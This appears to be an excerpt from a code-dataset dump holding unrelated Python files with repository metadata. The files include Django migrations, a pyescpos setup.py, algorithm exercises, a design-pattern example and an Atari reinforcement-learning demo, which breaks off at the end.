def __eq__(self, other):
"""Returns true if both objects are equal"""
if not isinstance(other, BlockQuery):
return False
return self.__dict__ == other.__dict__
def __ne__(self, other):
"""Returns true if both objects are not equal"""
return not self == other
| [
"lauraweindorf@gmail.com"
] | lauraweindorf@gmail.com |
e1c654b5c5879d0a85c2468db88c9e1e295c6459 | 1537873b83d1f3245ff60d2f95c366b163691f55 | /target_offer/dfs+bfs+动态规划/数字--线性动规/机器人的运动范围.py | ef7914742a6af2840ebf5f090343c75c5083832d | [] | no_license | 20130353/Leetcode | dc5c7fb08932abbf11e22e91b3edecac7f8753d5 | 488345a4713fae553559176c5bd3681e3bcac57d | refs/heads/master | 2020-03-31T08:46:12.005167 | 2020-03-15T16:32:11 | 2020-03-15T16:32:11 | 152,071,790 | 2 | 2 | null | null | null | null | UTF-8 | Python | false | false | 1,623 | py | # -*- coding: utf-8 -*-
# Author: sunmengxin
# time: 10/19/18
# file: 机器人的运动范围.py
# description:
'''
给定一个棋盘,要求机器人只能走上下左右的方向,不能进入到坐标之和等与s的方格,求机器人能进入多少方格?
'''
'''
反思:
1. 自定义的变量需要在init初始化函数中声明
2. 函数传递参数记得数好,代码检查要检查好!
3. 边界,看清是从1开始还是从0开始的!
'''
class Solution:
def __init__(self):
self.dir = [[0, 1], [0, -1], [1, 0], [-1, 0]]
def get_sum(self, a, b):
if a < 10:
sum_a = a
else:
sum_a = sum(list(map(int, str(a))))
if b < 10:
sum_b = b
else:
sum_b = sum(list(map(int, str(b))))
return sum_a + sum_b
def DFS(self, th, sum_, i, j, m, n, vis):
for k in range(4):
ni = i + self.dir[k][0]
nj = j + self.dir[k][1]
if ni >= 0 and nj >= 0 and ni < m and nj < n and not vis[ni][nj] and self.get_sum(ni, nj) <= th:
vis[ni][nj] = True
sum_[0] = sum_[0] + 1
self.DFS(th, sum_, ni, nj, m, n, vis)
def movingCount(self, threshold, rows, cols):
vis = [[False for _ in range(cols)] for _ in range(rows)]
sum_ = [0]
if threshold > 0:
sum_[0] = 1
vis[0][0] = True
self.DFS(threshold, sum_, 0, 0, rows, cols, vis)
return sum_[0]
if __name__ == '__main__':
so = Solution()
print(so.movingCount(15, 20, 20))
| [
"739400043@qq.com"
] | 739400043@qq.com |
99e5fa424a0ef71e162af19730fb467ff208dda8 | ef7eabdd5f9573050ef11d8c68055ab6cdb5da44 | /topCoder/srms/200s/srm221/div2/equal_substrings.py | b0909199b0c977307630973da3fc00be1ae58a2c | [
"WTFPL"
] | permissive | gauravsingh58/algo | cdbf68e28019ba7c3e4832e373d32c71902c9c0d | 397859a53429e7a585e5f6964ad24146c6261326 | refs/heads/master | 2022-12-28T01:08:32.333111 | 2020-09-30T19:37:53 | 2020-09-30T19:37:53 | 300,037,652 | 1 | 1 | WTFPL | 2020-10-15T09:26:32 | 2020-09-30T19:29:29 | Java | UTF-8 | Python | false | false | 292 | py | class EqualSubstrings:
def getSubstrings(self, str):
def is_fine(x, y):
return x.count('a') == y.count('b')
for i in xrange(len(str), 0, -1):
x, y = str[0:i], str[i:]
if is_fine(x, y):
return x, y
return '', str
| [
"elmas.ferhat@gmail.com"
] | elmas.ferhat@gmail.com |
09ce6b21b33aa832fc02eedb80d4a02dd5349e4e | c31c8095ce4d4e9686e3e7ad6b004342e49671fa | /forum/migrations/0038_auto_20181103_2022.py | 76831b0281d57327f7f14a521318272b62657bcc | [] | no_license | Lionalisk/arrakambre | 7bcc96dea2ca2a471572bfb1646256f1382ce25b | 2caece9be5eebf21ddfa87a6c821c32b5d5019a2 | refs/heads/master | 2020-12-07T19:31:24.471090 | 2020-01-09T10:14:29 | 2020-01-09T10:14:29 | 232,782,172 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 437 | py | # Generated by Django 2.1.1 on 2018-11-03 19:22
import datetime
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('forum', '0037_auto_20181103_1946'),
]
operations = [
migrations.AlterField(
model_name='commande',
name='date_validation',
field=models.DateTimeField(default=datetime.timedelta(0, 3600)),
),
]
| [
"lionel.varaire@free.fr"
] | lionel.varaire@free.fr |
bc5282590911d672024b010162ceacde85e9483f | 66f037cc0bf8683a814eb610d06edd3667f962e0 | /setup.py | 290b05874a5fd75eb62e9e02646db0773d3d63ac | [
"Apache-2.0"
] | permissive | cemsbr/pyescpos | 6118e7fcf4b5e85b94639be42cfb6fe87f084ba9 | 58ebc1b544458803c4235f3fa80e8fa376b18ec2 | refs/heads/master | 2020-12-08T07:20:24.977694 | 2019-12-30T00:33:08 | 2019-12-30T00:33:08 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,606 | py | # -*- coding: utf-8 -*-
#
# Copyright 2015 Base4 Sistemas Ltda ME
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
import io
import os
import re
import sys
from setuptools import setup
from setuptools.command.test import test as TestCommand
def read(*filenames, **kwargs):
    """Concatenate the contents of ``filenames``.

    Keyword arguments: ``encoding`` (default ``'utf-8'``) and ``sep``
    (default ``'\n'``), the string placed between file contents.
    """
    encoding = kwargs.get('encoding', 'utf-8')
    sep = kwargs.get('sep', '\n')

    def _slurp(name):
        with io.open(name, encoding=encoding) as handle:
            return handle.read()

    return sep.join(_slurp(name) for name in filenames)
def read_version():
    """Extract ``__version__`` from ``escpos/__init__.py`` (single-sourced)."""
    source = read(os.path.join('escpos', '__init__.py'))
    match = re.search(r"__version__ = '([^']+)'", source)
    return match.group(1)
class PyTest(TestCommand):
    """``python setup.py test`` command that delegates to pytest."""

    user_options = [('pytest-args=', 'a', 'Arguments to pass to py.test')]

    def initialize_options(self):
        TestCommand.initialize_options(self)
        self.pytest_args = ''

    def finalize_options(self):
        TestCommand.finalize_options(self)
        self.test_args = []
        self.test_suite = True

    def run_tests(self):
        # Imported here, because outside the command the eggs aren't loaded.
        import shlex
        import pytest
        raise SystemExit(pytest.main(shlex.split(self.pytest_args)))
long_description = read('README.rst')

# Core runtime dependencies; connection-specific backends are optional extras.
install_requires = [
    'future',
    'six',
    'python-decouple',
]

# Optional extras: e.g. ``pip install PyESCPOS[serial]`` pulls the serial backend.
extras_require = {
    'bluetooth': [
        'PyBluez',
    ],
    'serial': [
        'pySerial',
    ],
    'usb': [
        'PyUSB'
    ],
}

setup(
    name='PyESCPOS',
    version=read_version(),  # single-sourced from escpos/__init__.py
    description='Support for Epson ESC/POS printer command system.',
    long_description=long_description,
    long_description_content_type='text/x-rst',
    packages=[
        'escpos',
        'escpos.impl',
        'escpos.conn',
    ],
    install_requires=install_requires,
    extras_require=extras_require,
    tests_require=[
        'pytest==2.9.2',
    ],
    cmdclass={
        'test': PyTest  # wires ``python setup.py test`` to pytest
    },
    test_suite='escpos.tests',
    include_package_data=True,
    license='Apache Software License',
    platforms='any',
    url='http://github.com/base4sistemas/pyescpos/',
    author='Daniel Gonçalves',
    author_email='daniel@base4.com.br',
    classifiers=[
        'Development Status :: 4 - Beta',
        'Environment :: Other Environment',
        'Intended Audience :: Developers',
        'Intended Audience :: Information Technology',
        'License :: OSI Approved :: Apache Software License',
        'Natural Language :: English',
        'Operating System :: OS Independent',
        'Programming Language :: Python',
        'Programming Language :: Python :: 2.7',
        'Topic :: Printing',
        'Topic :: Software Development :: Libraries :: Python Modules',
        'Topic :: Office/Business :: Financial :: Point-Of-Sale',
    ]
)
| [
"daniel@base4.com.br"
] | daniel@base4.com.br |
b1a17e6907ea12401d7c3347b6eec3575696d4e3 | 5a92bb59c2cc369840b4b79f3bc60f868f179aad | /musette/decorators.py | 20cb02004d72c33d4d8ea3718ed2f3262d122e76 | [] | no_license | mapeveri/django-musette | fc4c2629f3f5f913fa07b1f1910b01ae1da20a85 | c255f96eb8e95676a37fc0d6fce05c5212dce5c0 | refs/heads/master | 2023-04-28T20:22:56.576693 | 2018-01-26T21:04:29 | 2018-01-26T21:04:29 | 36,764,649 | 52 | 16 | null | 2023-04-16T14:39:16 | 2015-06-02T22:06:42 | Python | UTF-8 | Python | false | false | 592 | py | from django.http import HttpResponseRedirect
def user_is_troll(f):
    """
    Decorator that only runs the view when the user is not a troll.

    Anonymous users and trolls are redirected to the site root.

    Args:
        f (function): View function to decorate.

    Returns:
        function: The wrapped view.
    """
    # Local import keeps the module's dependency block untouched.
    from functools import wraps

    @wraps(f)  # bug fix: preserve the view's __name__/__doc__ for introspection
    def wrap(request, *args, **kwargs):
        if request.user.is_authenticated():
            # request.user.user is the profile object carrying the troll flag.
            if not request.user.user.is_troll:
                return f(request, *args, **kwargs)
            return HttpResponseRedirect('/')
        return HttpResponseRedirect('/')
    return wrap
| [
"martinpeveri@gmail.com"
] | martinpeveri@gmail.com |
b0af1ed7b613f4265aabeb10d41c8e0bfe612097 | de24f83a5e3768a2638ebcf13cbe717e75740168 | /moodledata/vpl_data/409/usersdata/329/79574/submittedfiles/av1_programa1.py | 2ed47605cdf936c44c7349f815554de8ad917b01 | [] | no_license | rafaelperazzo/programacao-web | 95643423a35c44613b0f64bed05bd34780fe2436 | 170dd5440afb9ee68a973f3de13a99aa4c735d79 | refs/heads/master | 2021-01-12T14:06:25.773146 | 2017-12-22T16:05:45 | 2017-12-22T16:05:45 | 69,566,344 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 150 | py | # -*- coding: utf-8 -*-
numero = int(input("digite o valor de numero="))
# Bug fix: the original computed ``numero*0.5`` and then tested ``par\\0``,
# which is a syntax error.  Parity is decided by the remainder modulo 2.
if numero % 2 == 0:
    print("PAR")
else:
    print("IMPAR")
| [
"rafael.mota@ufca.edu.br"
] | rafael.mota@ufca.edu.br |
b9d447833ab24d6874b73bbb3fdfdabb55b0f5e3 | eafddc14e1381db53b87d42e7aa12dfb4bcf2d6e | /pandemonium/demons/online_td.py | 3bece670fce0ac68e4ce456ffac707d4821b1a45 | [] | no_license | konichuvak/pandemonium | b9d1d2f8c3529b6869f6bda1d6ca10c6c0f94052 | 57083b311ea209fe156f8575cc682e6c88211b74 | refs/heads/master | 2022-11-23T21:57:21.276033 | 2020-07-26T03:42:51 | 2020-07-26T03:42:51 | 240,851,837 | 1 | 0 | null | 2020-07-06T19:54:41 | 2020-02-16T07:45:09 | Python | UTF-8 | Python | false | false | 1,844 | py | from typing import Type
import torch
import torch.nn.functional as F
from pandemonium.demons import PredictionDemon, Demon, Loss, ControlDemon
from pandemonium.experience import Transition
from pandemonium.traces import EligibilityTrace, AccumulatingTrace
from pandemonium.utilities.utilities import get_all_classes
class OnlineTD(Demon):
    r""" Base class for backward-view (online) :math:`\TD` methods. """

    def __init__(self,
                 trace_decay: float,
                 eligibility: Type[EligibilityTrace] = AccumulatingTrace,
                 criterion: callable = F.smooth_l1_loss,
                 **kwargs):
        # The base class's eligibility machinery is bypassed (passed as None);
        # the trace is constructed locally once the value-function parameters
        # are available on this instance.
        super().__init__(eligibility=None, **kwargs)
        self.criterion = criterion

        # TODO: fails for distributional learning and non-FA
        # The trace is shaped like the *first* parameter tensor of the value
        # function — presumably a single linear layer; confirm for deeper nets.
        if isinstance(self, PredictionDemon):
            trace_dim = next(self.avf.parameters()).shape
        elif isinstance(self, ControlDemon):
            trace_dim = next(self.aqf.parameters()).shape
        else:
            raise TypeError(self)
        self.λ = eligibility(trace_decay, trace_dim)

    def delta(self, t: Transition) -> Loss:
        """ Specifies the update rule for approximate value function (avf)

        Since the algorithms in this family are online, the update rule is
        applied on every `Transition`.
        """
        raise NotImplementedError

    def target(self, t: Transition, v: torch.Tensor):
        """ Computes one-step update target. """
        raise NotImplementedError

    def learn(self, t: Transition):
        # Online methods consume exactly one transition per update.
        assert len(t) == 1
        # # Off policy importance sampling correction
        # π = self.gvf.π.dist(t.x0, self.aqf).probs[0][t.a]
        # b = self.μ.dist(t.x0, self.aqf).probs[0][t.a]
        # ρ = π / b
        return self.delta(t[0])
# Re-export every class defined in this module.
__all__ = get_all_classes(__name__)
| [
"arialinvlad@gmail.com"
] | arialinvlad@gmail.com |
0dc698dfd287422f17b4fb2d0ef103d508285cfd | 81dcd706b4d879fa4348630c24c86b88b6c570e2 | /rx/concurrency/scheduleditem.py | fd7fd360f7b6836e1b7eb31f61750f6ad7a31830 | [
"Apache-2.0"
] | permissive | Reactive-Extensions/RxPy | 763996efc5eeecb8af308d70bf2f1e64601cff79 | 9f9b1de0ab833e53b0d1626a3b43a6c9424f01ec | refs/heads/master | 2023-06-12T16:58:04.960259 | 2013-09-26T16:20:15 | 2013-09-26T16:20:15 | 13,126,788 | 81 | 12 | null | 2015-06-16T08:16:50 | 2013-09-26T15:44:19 | Python | UTF-8 | Python | false | false | 1,335 | py | from datetime import timedelta
from rx.disposables import SingleAssignmentDisposable
def default_sub_comparer(x, y):
    """Three-way compare: 0 when equal, 1 when x > y, otherwise -1."""
    if x == y:
        return 0
    return 1 if x > y else -1
class ScheduledItem(object):
    """A unit of work queued on a scheduler, ordered by its due time."""

    def __init__(self, scheduler, state, action, duetime, comparer=None):
        self.scheduler = scheduler
        self.state = state
        self.action = action
        self.duetime = duetime
        self.comparer = comparer or default_sub_comparer
        self.disposable = SingleAssignmentDisposable()

    def invoke(self):
        # Store the action's disposable so the item can later be cancelled.
        self.disposable.disposable = self.invoke_core()

    def compare_to(self, other):
        """Three-way compare against *other* by due time."""
        return self.comparer(self.duetime, other.duetime)

    def is_cancelled(self):
        return self.disposable.is_disposed

    def invoke_core(self):
        return self.action(self.scheduler, self.state)

    def __lt__(self, other):
        # Bug fix: removed a leftover debug print() that ran on every
        # comparison (e.g. inside priority-queue sifting).
        return self.compare_to(other) < 0

    def __gt__(self, other):
        return self.compare_to(other) > 0

    def __eq__(self, other):
        return self.compare_to(other) == 0
| [
"dag@brattli.net"
] | dag@brattli.net |
2658e1e8eb6cdeb61ce04a68e94ef08aa83f927d | 9eaa2c64a777bd24a3cccd0230da5f81231ef612 | /study/1905/month01/code/Stage2/day05/seek.py | 6c571cb29330f9a2272cd42ca7c5fb461ab8de33 | [
"MIT"
] | permissive | Dython-sky/AID1908 | 4528932f2ca66b844d8a3fcab5ed8bf84d20eb0c | 46cd54a7b36b5f009974f2bbb7005a4ad440ca1a | refs/heads/master | 2022-04-14T12:23:30.426270 | 2020-04-01T18:05:19 | 2020-04-01T18:05:19 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 368 | py | """
seek.py — file offset (seek) demo
Notes: 1. Every open() starts with the file offset at the beginning.
      2. Opening in mode 'a' puts the file offset at the end.
      3. Read and write operations share one file offset.
"""
f = open("test.txt","rb+") # binary read/write
data = f.read(5)
print("文件偏移量:",f.tell()) # show the current file offset
f.seek(10,2) # move the offset: 10 bytes past the end (whence=2)
f.write(b"&&&")
f.close()
| [
"dong_1998_dream@163.com"
] | dong_1998_dream@163.com |
91bb1b26efd36c500d9e15b58b14f8ad7f72edcf | 05e590af914370c3fe02526794ce9b41be893d2c | /day03/BMI輸入.py | cb18dff4cc02d0f77076c8344e698d4428201d39 | [] | no_license | vincenttuan/yzu_python_20210414 | bf0f1d9f8549086008fe15701204dfc3a9ebf85a | b464c4691ce12e9076c8c2ab74158aeb4edc5bc7 | refs/heads/master | 2023-06-09T19:30:24.930453 | 2021-06-30T13:31:29 | 2021-06-30T13:31:29 | 362,433,389 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 252 | py | h = input('請輸入身高:')
w = input('請輸入體重:')
print(h, type(h))  # input() returns str
print(w, type(w))
h = float(h) # convert str to float
w = float(w) # convert str to float
print(h, type(h))
print(w, type(w))
bmi = w / ((h/100) ** 2)  # BMI = weight(kg) / height(m)^2; h is given in cm
print("%.2f" % bmi)
| [
"vincentjava@yahoo.com.tw"
] | vincentjava@yahoo.com.tw |
49fa4272dfdc25cd6155b9142b112894cde12ff6 | 15f321878face2af9317363c5f6de1e5ddd9b749 | /solutions_python/Problem_199/1106.py | 366d126dd8acc1bd5de5d462ea61c8629d734481 | [] | no_license | dr-dos-ok/Code_Jam_Webscraper | c06fd59870842664cd79c41eb460a09553e1c80a | 26a35bf114a3aa30fc4c677ef069d95f41665cc0 | refs/heads/master | 2020-04-06T08:17:40.938460 | 2018-10-14T10:12:47 | 2018-10-14T10:12:47 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 848 | py | import sys
def pancakes(pancakes, k):
    """Return the minimum number of size-``k`` flips turning every pancake
    in ``pancakes`` (a string of '+'/'-') happy-side up, or "IMPOSSIBLE".

    Greedy left-to-right: each position at which the accumulated flips leave
    a '-' forces a flip starting there; positions in the final window that
    remain '-' make the case impossible.
    """
    # Bug fix: the original kept the Python-2 ``map`` object and then called
    # ``len()`` on it, which raises TypeError on Python 3 — materialize a list.
    states = [0 if c == '+' else 1 for c in pancakes]
    n = len(states)
    flips = []
    for i in range(n - k + 1):
        # XOR of the flips whose window still covers position i.
        acc = 0
        for j in range(max(0, i - k + 1), i):
            acc ^= flips[j]
        flips.append(states[i] ^ acc)
    for i in range(n - k + 1, n):
        # Tail positions can no longer start a flip; they must already be '+'.
        acc = 0
        for j in range(max(0, i - k + 1), min(i, n - k + 1)):
            acc ^= flips[j]
        if states[i] ^ acc == 1:
            return "IMPOSSIBLE"
    return sum(flips)
if __name__ == '__main__':
    # Input file (argv[1]): first line is the number of cases; each case line
    # holds the pancake string and the flipper size K separated by a space.
    test = open(sys.argv[1], 'r')
    for i in range(int(test.readline().strip())):
        pcks, k = test.readline().split(' ')
        print('Case #' + str(i + 1) + ': ' + str(pancakes(pcks, int(k))))
| [
"miliar1732@gmail.com"
] | miliar1732@gmail.com |
e19ad2f849b496bee9dad29daa61c493127d6b68 | 790743ea7f6f2d3b15fcd847171cb5d902380387 | /wfdispatcher/helpers/sanitize.py | 72ea67a0ac7e425df57fc5a8835a2d92d27c1df3 | [
"MIT"
] | permissive | lsst-sqre/wfdispatcher | d10cad7e83fce62b95b53c8bde608482d2287090 | 28761df89b44f0c46f4d15142e10bbd963203f35 | refs/heads/master | 2021-07-18T18:54:21.345342 | 2021-01-25T21:29:17 | 2021-01-25T21:29:17 | 235,692,956 | 0 | 0 | NOASSERTION | 2020-10-05T17:12:48 | 2020-01-23T00:07:36 | Python | UTF-8 | Python | false | false | 415 | py | from argo.workflows.client import ApiClient
def sanitize(obj):
    """Return an object suitable for a JSON post.
    """
    client = ApiClient()
    try:
        return client.sanitize_for_serialization(obj)
    except AttributeError:
        # Some generated models (e.g. V1Container) lack ``swagger_types``,
        # so direct serialization raises AttributeError; serialize the
        # plain-dict form instead.
        return client.sanitize_for_serialization(obj.to_dict())
| [
"athornton@gmail.com"
] | athornton@gmail.com |
5b35c432076b79190742a987b3d54936865f38e8 | 163bbb4e0920dedd5941e3edfb2d8706ba75627d | /Code/CodeRecords/2341/48117/267922.py | d402df48cf6014e22ca2f603971451d052caa831 | [] | no_license | AdamZhouSE/pythonHomework | a25c120b03a158d60aaa9fdc5fb203b1bb377a19 | ffc5606817a666aa6241cfab27364326f5c066ff | refs/heads/master | 2022-11-24T08:05:22.122011 | 2020-07-28T16:21:24 | 2020-07-28T16:21:24 | 259,576,640 | 2 | 1 | null | null | null | null | UTF-8 | Python | false | false | 764 | py | questNum = int(input())
# For each test case: read two sorted integer arrays and print their merge,
# space-separated (the file-level trailing print() ends the line).
for quest in range(questNum):
    n1n2 = input().split(' ')
    n1 = int(n1n2[0])
    n2 = int(n1n2[1])
    s1 = input().split(' ')
    s2 = input().split(' ')
    # Convert only the first n1/n2 entries, as the original did.
    for i in range(n1):
        s1[i] = int(s1[i])
    for j in range(n2):
        s2[j] = int(s2[j])
    # Two-pointer merge of the already-sorted arrays.
    p1 = 0
    p2 = 0
    ans = []
    while p1 < n1 and p2 < n2:
        if s1[p1] < s2[p2]:
            ans.append(s1[p1])
            p1 += 1
        else:
            ans.append(s2[p2])
            p2 += 1
    if p1 >= n1:
        ans += s2[p2:]
    elif p2 >= n2:
        ans += s1[p1:]
    # Bug fix (cleanup): both branches of the original if/else printed the
    # exact same thing, so a single print per element suffices; the trailing
    # space the judge saw is preserved.
    for v in ans:
        print(v, end=' ')
print() | [
"1069583789@qq.com"
] | 1069583789@qq.com |
078f9c1b302d74b436331fcec70a91af4674d2ea | f66e6a3bc5f6eae570afa2013325d462f530cff6 | /core/seller/migrations/0020_auto_20210306_1009.py | 9cbeffc379f38f47209547f43ed97b420be855db | [] | no_license | Mahe07/vyavaharback | 3cb30e227d9e0c25c86ba4e20f9cafce054c4a2a | 4e35cac3b643197a78e420d34ea3f45cce368e46 | refs/heads/main | 2023-08-10T17:21:56.538518 | 2021-09-17T03:53:44 | 2021-09-17T03:53:44 | 407,386,489 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 972 | py | # Generated by Django 3.1.6 on 2021-03-06 04:39
from django.db import migrations, models
class Migration(migrations.Migration):

    dependencies = [
        ('seller', '0019_auto_20210306_1001'),
    ]

    # NOTE(review): max_digits=999999999 far exceeds what database backends
    # support for DECIMAL columns — presumably a placeholder; confirm the
    # intended precision before depending on these columns.
    operations = [
        migrations.AddField(
            model_name='seller',
            name='GST_commission',
            field=models.DecimalField(decimal_places=2, max_digits=999999999, null=True),
        ),
        migrations.AddField(
            model_name='seller',
            name='TCS',
            field=models.TextField(null=True),
        ),
        migrations.AddField(
            model_name='seller',
            name='gross_commission',
            field=models.DecimalField(decimal_places=2, max_digits=999999999, null=True),
        ),
        migrations.AddField(
            model_name='seller',
            name='net_commission',
            field=models.DecimalField(decimal_places=2, max_digits=999999999, null=True),
        ),
    ]
| [
"noreply@github.com"
] | Mahe07.noreply@github.com |
23b5f27bb1a0350685945804c329b647dfa28c29 | 05a70c12df808455100598d8a6fdb5635c641ab8 | /Ene-Jun-2019/Ejemplos/Patrones de Diseño/strategy.py | 35f73bb89aa9b988c20e2b14fe555abd0e23aac4 | [
"MIT"
] | permissive | Jonathan-aguilar/DAS_Sistemas | 991edcc929c33ba9bb8bc84e741b55c10a8420a3 | 4d02efc64161871084df1bff258112351e5d1241 | refs/heads/development | 2023-07-24T12:26:54.698452 | 2021-09-02T20:52:26 | 2021-09-02T20:52:26 | 289,764,892 | 1 | 0 | MIT | 2021-09-02T20:52:27 | 2020-08-23T20:54:55 | Python | UTF-8 | Python | false | false | 1,051 | py | import abc
class Context:
    """Holds the current sorting strategy and delegates the work to it."""

    def __init__(self, strategy):
        self._strategy = strategy

    def context(self):
        """Run whichever strategy is currently configured."""
        self._strategy.sort()

    def set_strategy(self, strategy):
        """Swap in a different strategy at runtime."""
        self._strategy = strategy
class Strategy(abc.ABC):
    """Interface every concrete sorting strategy must implement."""

    @abc.abstractmethod
    def sort(self):
        """Perform the sort."""
class QuickSort(Strategy):
    """Concrete strategy: stand-in for a quicksort implementation."""

    def sort(self):
        print('Ya ordene con QuickSort!')
class MergeSort(Strategy):
    """Concrete strategy: stand-in for a mergesort implementation."""

    def sort(self):
        print('Ya ordene con MergeSort!')
class BubbleSort(Strategy):
    """Concrete strategy: stand-in for a bubblesort implementation."""

    def sort(self):
        print('Ya ordene con BubbleSort')
def main():
    """Demonstrate swapping sort strategies at runtime."""
    # Sorting 1000000 elements here
    context = Context(QuickSort())
    context.context()
    # Sorting 100000 elements here
    context.set_strategy(MergeSort())
    context.context()
    # Sorting 100 elements here
    context.set_strategy(BubbleSort())
    context.context()
if __name__ == "__main__":
main() | [
"anhell.death999@gmail.com"
] | anhell.death999@gmail.com |
fac4f2b518f628a2e53ff0ddf3d1d5613d4373eb | 518d911a66485947c5d336e96a842f162ef9caf1 | /res/scripts/client/gui/scaleform/daapi/view/meta/browsermeta.py | 0274a83671990e9a045e8ed867bbf228e331291c | [] | no_license | wotmods/WOTDecompiled | 84b8e5d32ee73e1356b4d57318eb76dfac6b5220 | 45fd599666c55cb871f6b84b0ec977b9d4baf469 | refs/heads/master | 2020-12-25T21:34:26.096544 | 2014-11-05T13:58:39 | 2014-11-05T13:58:39 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,466 | py | # 2014.10.18 14:42:01 Central European Daylight Time
#Embedded file name: scripts/client/gui/Scaleform/daapi/view/meta/BrowserMeta.py
from gui.Scaleform.framework.entities.DAAPIModule import DAAPIModule
class BrowserMeta(DAAPIModule):
    """DAAPI meta-bridge for the in-game browser Flash view.

    The ``browser*``/``onBrowser*`` handlers are Python-side callbacks meant
    to be overridden by a subclass; the base implementations only report an
    override error.  The ``as_*S`` methods forward to the Flash object once
    DAAPI has been initialised.
    """

    def browserAction(self, action):
        self._printOverrideError('browserAction')

    def browserMove(self, x, y, z):
        self._printOverrideError('browserMove')

    def browserDown(self, x, y, z):
        self._printOverrideError('browserDown')

    def browserUp(self, x, y, z):
        self._printOverrideError('browserUp')

    def browserFocusOut(self):
        self._printOverrideError('browserFocusOut')

    def onBrowserShow(self, needRefresh):
        self._printOverrideError('onBrowserShow')

    def onBrowserHide(self):
        self._printOverrideError('onBrowserHide')

    def as_loadingStartS(self):
        if self._isDAAPIInited():
            return self.flashObject.as_loadingStart()

    def as_loadingStopS(self):
        if self._isDAAPIInited():
            return self.flashObject.as_loadingStop()

    def as_configureS(self, title, showActionBtn):
        if self._isDAAPIInited():
            return self.flashObject.as_configure(title, showActionBtn)
+++ okay decompyling res/scripts/client/gui/scaleform/daapi/view/meta/browsermeta.pyc
# decompiled 1 files: 1 okay, 0 failed, 0 verify failed
# 2014.10.18 14:42:01 Central European Daylight Time
| [
"chodakk@RWAMWCOE31488.emea.roche.com"
] | chodakk@RWAMWCOE31488.emea.roche.com |
2e45e4afa57edbe0a2068c79d6929b87ee5a18d1 | 5c6fc62dd057301907c83f3fc29349e3ee02a375 | /picking_invoice_pending/__openerp__.py | 9f6c7c7493c4b014bef424a744febf1d7981e250 | [] | no_license | Comunitea/custom_apolo | 45ce0c79d07269e02099e0bdfdad461d48b73f34 | d74cee261ea703fe5dc34dd33f374695f8d76b57 | refs/heads/master | 2021-03-22T04:38:21.738794 | 2015-12-28T12:31:01 | 2015-12-28T12:31:01 | 31,951,155 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,700 | py | # -*- coding: utf-8 -*-
##############################################################################
#
# Authors: Santiago Argüeso
# Copyright Pexego SL 2012
# Omar Castiñeira Saavedra Copyright Comunitea SL 2015
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################
{
    'name': 'Pending invoices accounting from Picking',
    'description': "Allow to account invoices when transfering incoming "
                   "pickings, when invoice is validated previous account move "
                   "is reverted.",
    'version': '1.0',
    'author': 'Pexego',
    'category': 'Finance',
    'website': 'http://www.pexego.es',
    # Modules that must be installed before this one.
    'depends': ['base',
                'account',
                'account_reversal',
                'stock',
                'midban_issue',
                'purchase_discount',
                'midban_depot_stock'],
    # XML data files loaded on install/update.
    'data': ['res_company_view.xml',
             'stock_picking_view.xml'],
    'active': False,
    'installable': True,
}
| [
"omarcs7r@gmail.com"
] | omarcs7r@gmail.com |
058531a00970d0ad1c88dd43821e6e0509a17daa | 72db77883a5d2d841908f67f85f395c614c53832 | /demo.py | cd2047c26df87a4f869e0714fc79d17b12aeb43c | [] | no_license | limo1995/atari-cma-es | c7045af05542a10aa7c479da40bd4c6d17466667 | 7f3a1693112dfa71306b95c628a58b16cfb34242 | refs/heads/master | 2021-09-24T14:03:10.787313 | 2018-10-10T02:57:04 | 2018-10-10T02:57:04 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,165 | py | import models
import mentalitystorm.transforms as tf
import torchvision.transforms as TVT
from mentalitystorm.basemodels import MultiChannelAE
from mentalitystorm.runners import Run
from mentalitystorm.config import config
from mentalitystorm.policies import VCPolicyMultiAE, RolloutGen
from mentalitystorm.data_containers import ActionEmbedding
import torch
import gym
from viewer import *
# Colour masks segment a SpaceInvaders frame into per-object channels; each
# mask is appended as a new channel on the image.
shots = tf.ColorMask(lower=[128, 128, 128], upper=[255, 255, 255], append=True)
player = tf.ColorMask(lower=[30, 100, 40], upper=[70, 180, 70], append=True)
cut_player = tf.SetRange(0, 60, 0, 210, [4])  # zero channel 4 in that screen region
invader = tf.ColorMask(lower=[120, 125, 25], upper=[140, 140, 130], append=True)
cut_invader = tf.SetRange(0, 30, 0, 210, [5])  # zero channel 5 in that screen region
barrier = tf.ColorMask(lower=[120, 74, 30], upper=[190, 100, 70], append=True)
select = tf.SelectChannels([3, 4, 5, 6])  # keep only the four mask channels
observe = tf.ViewChannels('transform', (320, 480), channels=[0, 1, 2])
segmentor = TVT.Compose([shots, player, cut_player, invader, cut_invader,
                         barrier, select, TVT.ToTensor(), tf.CoordConv()])

device = config.device()

# One pre-trained autoencoder per object class.
shot_encoder = Run.load_model(r'.\modelzoo\vision\shots.run').eval().to(device=config.device())
player_encoder = Run.load_model(r'.\modelzoo\vision\player.run').eval().to(device=config.device())
invaders_encoder = Run.load_model(r'.\modelzoo\vision\invaders.run').eval().to(device=config.device())
barrier_encoder = Run.load_model(r'.\modelzoo\vision\barrier.run').eval().to(device=config.device())

# Combine the per-object encoders: each reads its mask channel plus channels
# 4 and 5 (presumably the CoordConv coordinate planes — confirm) and writes
# one latent channel.
